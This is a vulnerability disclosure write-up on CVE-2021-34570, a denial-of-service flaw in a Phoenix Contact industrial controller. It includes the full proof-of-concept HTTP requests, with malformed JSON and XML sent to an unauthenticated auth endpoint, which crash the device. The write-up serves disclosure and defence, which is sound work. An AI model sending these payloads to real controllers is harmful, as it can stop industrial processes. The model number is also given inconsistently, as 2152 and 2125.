Author: Oliver Carrigan – OT Security Consultant
Introduction
The Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh industrial environments to control industrial processes such as manufacturing lines and building management systems. The controller was seen to be vulnerable to a restart vulnerability (CVE-2021-34570) which would allow an unauthenticated attacker with network access to the device to create a denial-of-service condition, impacting the availability of the device.
Vulnerability
The controller runs a Linux based operating system on top of which lies a REST-based API web service used to interact with the web-based HMI. The HMI is used to provide a graphical representation of the current process under control. In order to view the web-based HMI, the controller implements a 3-stage authentication process using Oauth to authenticate the user and ensure they are authorised to access the web-based HMI. An attacker could abuse the /_pxc_api/v1.2/auth/access-token endpoint used in the authentication process which would force the controller to restart due to a segmentation fault within the controller. This is achieved by crafting a malformed JSON request to the endpoint.
Host: <IP>
Connection: close
Content-Length: 129
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"code":"be3fcb3c2bdeff54","grant_type":"authorization_code","username":"*********","password":"********","state":"30a847a460c6a1f6"}The following POCs were used to launch the attack:
POST /_pxc_api/v1.2/auth/access-token
Host: <IP>
Connection: close
Content-Length: 3
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{
A
}POST /_pxc_api/v1.2/auth/access-token
Host: <IP>
Connection: close
Content-Length: 234
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<root>
<password>********</password>
<code>db0d04e21dbc0ede</code>
<grant_type/>
<state>4cf70d2058cb2b62</state>
<username>*********</username>
</root>Both POCs result in the controller returning the following response and the controller stops responding to ICMP requests.
HTTP/1.1 502 Bad Gateway Server: nginx Date: Content-Type: text/html Content-Length: 552 Connection: close <html> <head><title>502 Bad Gateway</title></head> <body> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx</center> </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page --> <!-- a padding to disable MSIE and Chrome friendly error page -->
Proof of Concept Video
Likelihood
Whilst /_pxc_api/v1.2/auth/access-token endpoint is accessible without any authentication an attacker would require access to a closed network, typically protected by a suitable firewall, the controller is on to perform this attack.
Impact
The AXC F 2125 controller is predominantly found within manufacturing facilities and an attacker that successfully exploits this vulnerability would be able to stop the manufacturing process resulting in financial loss and reputational harm. An attacker could script this exploit in order to cause a lasting impact on the production output.